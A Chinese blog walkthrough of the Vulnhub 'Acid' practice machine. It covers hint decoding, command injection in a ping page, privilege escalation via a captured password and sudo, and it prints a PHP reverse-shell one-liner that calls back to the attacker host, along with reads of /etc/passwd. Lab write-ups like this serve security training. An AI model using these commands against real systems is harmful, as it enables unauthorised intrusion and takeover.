Vulnhub-Acid 靶机练习

最新推荐文章于 2024-09-15 23:59:42 发布
最新推荐文章于 2024-09-15 23:59:42 发布
阅读量469 收藏 1
点赞数 1
分类专栏: 漏洞复现 vulnhub靶场 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43232893/article/details/110131198
版权

Vulnhub-Acid靶机练习

准备

kali攻击机IP:192.168.255.139
靶机IP:192.168.255.145

主机发现

nmap -sP 192.168.0/24

在这里插入图片描述

端口扫描

nmap -sV -Pn -p- -v 192.168.255.145

在这里插入图片描述

访问33447端口开启的页面

在这里插入图片描述
什么都没有,再来看看网页元素
在这里插入图片描述
发现有两个目录 一个放的是图片 另一个访问看看,访问Challenge目录得到一个登录页面。
在这里插入图片描述
在这里插入图片描述
由于此页面没有什么可以利用的 再回头看看主页还有没有其他信息,发现最下面有一串加密了的数据。
在这里插入图片描述
这里是16进制加密。解出来又是Base64加密的字符串。
在这里插入图片描述
得到一个wow.jpg图片
在这里插入图片描述
访问wow.jpg发现访问不了,前面我们看到一个images的路径放着图片,发现可以访问此图片
在这里插入图片描述
在这里插入图片描述
先把图片下载下来用记事本打开看看,一般套路都是在图片最后有加密数据。
在这里插入图片描述
发现一条加密数据,先把多余符号删除得到一条完整的数据

3761656530663664353838656439393035656533376631366137633631306434

使用burp进行解码ASCLL解码,解码完成是一条32位的md5加密数据
在这里插入图片描述
解密后得到一个类似于密码的字符串也不知道有什么用
在这里插入图片描述
现在没什么思路了,那就扫扫目录看看有没有其他的,这里我用到dir工具进行目录扫描
在这里插入图片描述

发现/Challenge/include.php页面存在文件包含漏洞

在这里插入图片描述
后来想包含木马 发现不行就看看其他页面。

/Challenge/hacked.php页面也没有什么漏洞利用

在这里插入图片描述

在/Challenge/cake.php路径发现了一个/Magic_Box文件夹

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现服务器上有这个目录,扫一下路径。
在这里插入图片描述

发现command.php页面开放了ping功能

试试命令注入,发现可以执行命令
命令注入介绍跟利用
在这里插入图片描述

通过命令注入拿shell

反弹shell方法
这里他用的是php环境所以我们可以用php来反弹shell

nc -lvnp 444 //接收端
php -r '$sock=fsockopen("192.168.255.139",444);exec("/bin/sh -i <&3 >&3 2>&3");' //发送端

这里直接发看来不行,那就要url编码后试试。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权

提权简介
先获取一个python的标准shell,可以使用su命令。

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
接下来就可以看那些用户使用了/bin/bash

cat /etc/passwd

在这里插入图片描述
在这里插入图片描述

查看每个用户使用的文件

find / -user acid 2>/dev/null -ls

发现acid用户里有一个hint.pcapng可疑文件
在这里插入图片描述
到该文件所在目录下,通过python开启一个临时的https协议然后进行文件下载

python -m SimpleHTTPServer 8080

在这里插入图片描述
下载后用wireshark打开,只看tcp包,找到saman用户的密码
在这里插入图片描述
使用su命令切换到saman用户,密码为1337hax0r
在这里插入图片描述
最后使用sudo -i命令获取到root权限
sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。
在这里插入图片描述
在这里插入图片描述
学无止境,加油吧!

靶场渗透(二)——Acid渗透
Ramona的博客
08-02 920
测试环境 靶机Acid 打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描靶机Ip及开放端口 扫描ip:nmap -sP 192.168.111.1/24 扫描端口:nmap -p1-65535 -sV 靶机Ip 获取信息:ip为192.168.111.129 开放端口为33447/tcp 提供服务为web和apache 操作系统为ubun...
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2249
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
VulnHub打靶の-Acid
壊壊的诱惑你的博客
10-12 1176
靶机地址:https://download.vulnhub.com/acid/Acid.rar 首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171 nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本: root@Kali-X86:~# nmap -sV -p- 192.168.1.171 Starting Nmap...
Vulnhub靶场渗透练习(四) Acid
weixin_30951231的博客
07-08 385
利用namp 先进行扫描获取ip nmap 192.168.18.* 获取ip 没发现80端口 主机存活 猜测可以是个2000以后的端口 nmap -p1-65533 192.168.18.146 返回 192.168.18.146:33447 开放33447端口 利用御剑和进行burpsuit 爆破 得到 imges ,index ,challenge 等...
VulnHub靶场之Acid
A_dmin的博客
09-30 1101
VulnHub靶场之Acid 本来这个实验昨天就应该完成了的,但是在自己电脑上弄得时候直接卡死,,,,
vulnhub靶场,-Acid
kukudeshuo的博客
08-02 474
vulnhub靶场,-Acid 环境准备 靶机下载地址:https://www.vulnhub.com/entry/acid-server,125/ 攻击机:kali(192.168.109.128) 靶机:-Acid(192.168.109.149) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.149 使用nmap扫描查看目标靶机端口开放情况
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1954
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhubacid靶机渗透流程
weixin_44255856的博客
08-03 1040
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
VulnHubAcid靶场复盘
redwand的博客
03-15 5777
靶机要点,一、CTF常见的目录提示方式。二、提权过程中用户文件遍历。三、sudo配置不当提权。
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 312
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
Acid靶场实战
m0_65149086的博客
05-04 391
云尘靶场,靶机渗透,Vulhnub,Acid
CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现
wkend的博客
12-26 3350
0x01 了解本地文件包含 LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 0x02 了解远程代码执行 RCE(远程代码执行),远程...
靶机实战-Acid
滕财然的博客
01-26 877
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
VulnhubAcid实战
weixin_43862283的博客
04-29 391
1、发现主机 使用nmap对内网进行扫描,发现主机 nmap -sP 192.168.340/24 2、扫描端口 用nmap扫描目标主机,发现只有33447端口开启,http端口 nmap -sV -p0-65535 192.168.34.151 3、扫描网站目录并进行爆破 dirb http://192.168.34.151:33447 发现Challenge目录,进行目录爆破 访...
小琳AI课堂:确保大语言模型安全的八大策略--从数据隐私到用户教育
最新发布
wx740851326的博客
09-15 120
首先,我们要明白,保证大语言模型的安全,需要从多个方面入手,确保模型在技术、法律、伦理和社会层面都得到妥善处理。大家好,这里是小琳AI课堂。今天我们深入探讨如何保证大语言模型的安全,这可是关系到我们每个人哦!
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1307
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值